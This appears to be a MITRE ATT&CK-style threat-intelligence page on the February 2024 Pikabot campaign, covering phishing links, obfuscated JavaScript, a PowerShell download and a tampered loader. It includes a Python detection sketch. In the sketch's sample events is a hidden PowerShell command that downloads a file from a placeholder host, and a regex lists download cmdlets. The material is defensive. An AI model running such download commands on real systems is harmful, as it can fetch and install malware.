Pikabot Distribution February 2024

Pikabot was distributed in Pikabot Distribution February 2024 through malicious emails containing embedded links that led to malicious ZIP archives; the archives required user interaction before the follow-on infection could proceed. The version of Pikabot distributed featured significant changes over the 2023 variant, including reduced code complexity and simplified obfuscation mechanisms.[1][2]

ID: C0036
First Seen: February 2024 [1]
Last Seen: February 2024 [1]
Contributors: Inna Danilevich, U.S. Bank
Version: 1.0
Created: 17 July 2024
Last Modified: 28 October 2024

Techniques Used

Domain ID Name Use
Enterprise T1059.001 Command and Scripting Interpreter: PowerShell

Pikabot Distribution February 2024 passed execution from obfuscated JavaScript files to PowerShell scripts to download and install Pikabot.[1]

Enterprise T1059.007 Command and Scripting Interpreter: JavaScript

Pikabot Distribution February 2024 utilized obfuscated JavaScript files for initial Pikabot payload download.[1]

Enterprise T1574 Hijack Execution Flow

Pikabot Distribution February 2024 utilized a tampered copy of a legitimate executable, grepWinNP3.exe, as its first-stage Pikabot loader, modifying the open-source tool so that it executed malicious code when launched.[1]

Enterprise T1566.002 Phishing: Spearphishing Link

Pikabot Distribution February 2024 utilized emails with hyperlinks leading to malicious ZIP archive files containing scripts to download and install Pikabot.[1]
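The techniques above describe one execution chain: a script host runs the obfuscated JavaScript from the ZIP, that script hands off to PowerShell to download the payload, and a tampered grepWinNP3.exe acts as the loader. The following detection sketch is an added example written for this page, not code from MITRE or from the cited reports; the process-creation events and their field names (pid, ppid, image, cmdline) are constructed assumptions standing in for real endpoint telemetry.

```python
"""Detection sketch for the Pikabot delivery chain on this page:
ZIP -> obfuscated .js run by a Windows script host -> PowerShell download ->
tampered grepWinNP3.exe loader.  Events and field names are constructed."""
import re

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# Cmdlets / .NET members commonly seen when PowerShell is used to fetch a payload
DOWNLOAD_RE = re.compile(r"(downloadfile|downloadstring|invoke-webrequest|"
                         r"start-bitstransfer|net\.webclient)", re.I)

def image_name(path):
    """Return the lower-cased file name from a Windows image path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def detect_pikabot_chain(events):
    """Return a list of (rule, pid) findings over process-creation events."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        img = image_name(e["image"])
        parent = by_pid.get(e["ppid"])
        pimg = image_name(parent["image"]) if parent else ""
        # Rule 1: script host executing a .js file spawns PowerShell (T1059.007 -> T1059.001)
        if img == "powershell.exe" and pimg in SCRIPT_HOSTS and ".js" in parent["cmdline"].lower():
            findings.append(("js_to_powershell", e["pid"]))
        # Rule 2: that PowerShell child carries a download primitive in its command line
        if img == "powershell.exe" and pimg in SCRIPT_HOSTS and DOWNLOAD_RE.search(e["cmdline"]):
            findings.append(("powershell_download", e["pid"]))
        # Rule 3: grepWinNP3.exe (a tampered copy was the loader, T1574) running outside Program Files
        if img == "grepwinnp3.exe" and not e["image"].lower().startswith("c:\\program files"):
            findings.append(("grepwinnp3_unusual_path", e["pid"]))
    return findings

# Constructed sample events (not real telemetry); the URL is a placeholder
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'wscript.exe "C:\Users\u\AppData\Local\Temp\Invoice_2024.js"'},
    {"pid": 300, "ppid": 200, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -w hidden (New-Object Net.WebClient).DownloadFile('http://PLACEHOLDER.invalid/x','x')"},
    {"pid": 400, "ppid": 300, "image": r"C:\Users\u\AppData\Local\Temp\grepWinNP3.exe", "cmdline": "grepWinNP3.exe"},
    {"pid": 500, "ppid": 100, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe Get-Process"},
]

if __name__ == "__main__":
    for rule, pid in detect_pikabot_chain(SAMPLE_EVENTS):
        print(f"{rule}: pid {pid}")
```

The benign PowerShell launched from Explorer (pid 500) produces no finding, while the script-host chain and the loader running from a temp directory each do.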

Software

ID Name Description
S1145 Pikabot

Pikabot Distribution February 2024 distributed Pikabot for initial access purposes in February 2024.[1][2]

References